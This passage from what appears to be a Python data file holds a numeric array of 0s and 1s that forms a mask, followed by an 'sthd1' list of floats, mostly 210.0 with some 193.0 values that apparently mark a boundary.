0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
sthd1 = [210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 193.0, 193.0, 193.0, 193.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 193.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
210.0, 210.0, 210.0, 210.0, 210.0, 193.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0, 210.0,
